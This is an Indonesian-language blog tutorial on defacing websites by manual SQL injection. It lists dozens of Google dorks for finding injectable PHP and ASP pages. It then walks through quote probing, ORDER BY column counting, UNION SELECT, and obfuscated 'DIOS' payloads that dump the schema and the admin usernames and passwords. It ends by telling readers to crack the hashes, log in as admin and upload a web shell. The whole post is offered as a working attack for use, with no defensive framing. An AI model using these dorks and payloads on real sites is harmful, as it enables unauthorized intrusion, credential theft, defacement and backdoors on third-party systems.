Hai...!
Kali Ini Gw Share Ilmu Lagi Ye Kan..
Tentang Cara Deface poc SQLi Manual...
Langsung Ae Gayn Ke Tutornya..
Cekidot..
[#] Bahan - Bahan [#]
1. Dork (Fresh Kaganya Tergantung Face :v)
inurl:"merchandise/index.php?cat="
inurl:".php?index="
inurl:".php?CID="
inurl:".php?SID="
inurl:".php?term="
inurl:".php?sellerID="
inurl:".php?func="
inurl:".php?idz="
inurl:".php?opt="
inurl:".php?txtMainNavID="
inurl:".php?main="
inurl:".php?mood&cat="
inurl:".php?ResultGridPage="
inurl:".php?machineid="
inurl:".php?p1="
inurl:".php?uid="
inurl:".php?typeid="
inurl:".php?calls="
inurl:".php?pt="
inurl:".php?q="
inurl:".php?prod_cat_main="
inurl:".php?prod_cat="
inurl:".php?gid="
inurl:".php?psid="
inurl:".php?tid="
inurl:".php?brand="
inurl:".php?catld="
inurl:".php?name="
inurl:".php?c_id="
inurl:".php?s_id="
inurl:".php?p_id="
inurl:".php?subtype="
inurl:".php?cateid="
inurl:".php?catepid="
inurl:".php?pttype="
inurl:".php?statusik="
inurl:".php?aid="
inurl:".php?gid="
inurl:".php?bo_table="
inurl:".php?recordID="
inurl:".php?sel="
inurl:".php?nav_id="
inurl:".php?shopGroupId="
inurl:".php?idsc="
inurl:".php?pc1="
inurl:".php?pno="
inurl:".php?elid="
inurl:".php?for="
inurl:".php?pricat="
inurl:".php?parent_id="
inurl:".php?brand_id="
inurl:".php?pcid="
inurl:".php??product_id="
inurl:".php?man_code="
inurl:".php?marque="
inurl:".php?sec_id="
inurl:".php?history_cms.php?selectCat="
inurl:".php?ph="
inurl:".php?aid="
inurl:"add.asp?bookid="
inurl:"add_cart.asp?num="
inurl:"addcart.asp?"
inurl:"addItem.asp"
inurl:"add-to-cart.asp?ID="
inurl:"addToCart.asp?idProduct="
inurl:"addtomylist.asp?ProdId="
inurl:"adminEditProductFields.asp?intProdID="
inurl:"advSearch_h.asp?idCategory="
inurl:"affiliate.asp?ID="
inurl:"affiliate-agreement.cfm?storeid="
inurl:"affiliates.asp?id="
inurl:"ancillary.asp?ID="
inurl:"archive.asp?id="
inurl:"article.asp?id="
inurl:"aspx?PageID"
Segitu Dulu Dorknya...
[NB .:: Kembangin Lagi Tod!! ::.]
2. Kuota Yang Cukup(Kalo Kaga Ada
Ya Pake Wifi)
3. Kesabaran :v
4. Niat
5. Kopi,Rokok(Biar Santuy Eaa Coeg)
6. Dios
[#] Step By Step Defacenya [#]
1. Dorking Dulu Pake Dork Yang Di Atas....
2. Pilih Site Target Yang Kira Kira Vuln...
Gw Pake Site
http://www.sitetarget.co.li/news.php?id=1
3. Cek Vuln Atau Nggaknya..
Caranya Tambain ' Di Target..
Contoh::
http://www.sitetarget.co.li/news.php?id=1
Jadinya..
http://www.sitetarget.co.li/news.php?id=1'
Kalo Vuln Ada Perubahan Dari Site Targetnya...
Misal :: (Your SQL Syntax Blablablabla , Blank , Ada Yang Berubah...)
4. Lanjut Ke Order Bynya..
http://www.sitetarget.co.li/news.php?id=1+order+by+1--+-
[KAGA ERROR]
Kita Cari Errornya:v
http://www.sitetarget.co.li/news.php?id=1+order+by+2--+-
[KAGA ERROR JUGA]
http://www.sitetarget.co.li/news.php?id=1+order+by+3--+-
[KAGA ERROR JUGA]
http://www.sitetarget.co.li/news.php?id=1+order+by+4--+-
[KAGA ERROR JUGA]
http://www.sitetarget.co.li/news.php?id=1+order+by+5--+-
[ERROR NIH]
Lanjut Ke Union Select(Karna Kita Kan Dah Tau Tuh Jumlah Kolomnya...)
http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,3,4--+-
Nah... Nongol Nih Angka Cantiknya...
3 , 2
Kita Masukin Diosnya Di angka Cantik Yang Nongol Tadi..
(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)
Jadinya Gini...
http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x),4--+-
Next..
Kita Dump User Password adminnya
Caranya..
(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(namatabel)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,namakolom,0x203a3a20,namakolom))))x)
Begini Jadinya:v
http://www.sitetarget.co.li/news.php?id=1+union+select+1,2,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(admin)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),4--+-
Nah Kan..
Nongol Noh User Pasword Adminnya :D
Next Cari Admin Loginnya(adlog)
Kalo Ada..
Langsung ae Login Pake User Password Yang Kita Dapet Tadi..
Kadang.. Passwordnya Harus Di Crack Lagi:v(Sandi Yang Berupa Algoritma" MD5,MD4,MD2,SHA1,Base64 dan banyak Lainnya)
Kalo Udah Berhasil Login..
Langsung Ae Cari Tempat Upload.
Upload Dah Tuh Shell Kebanggaan Klean..
Kemudian Akses Shell Yang Klean Tanam Di Web Tuh...
Sekian Dari Gw
[#] Mr.Kancil303 [#]
Kalo Ada Salah Kata
Gw Mohon Maap >_<
[#] Happy Deface :D [#]
P wr.wb
BalasHapus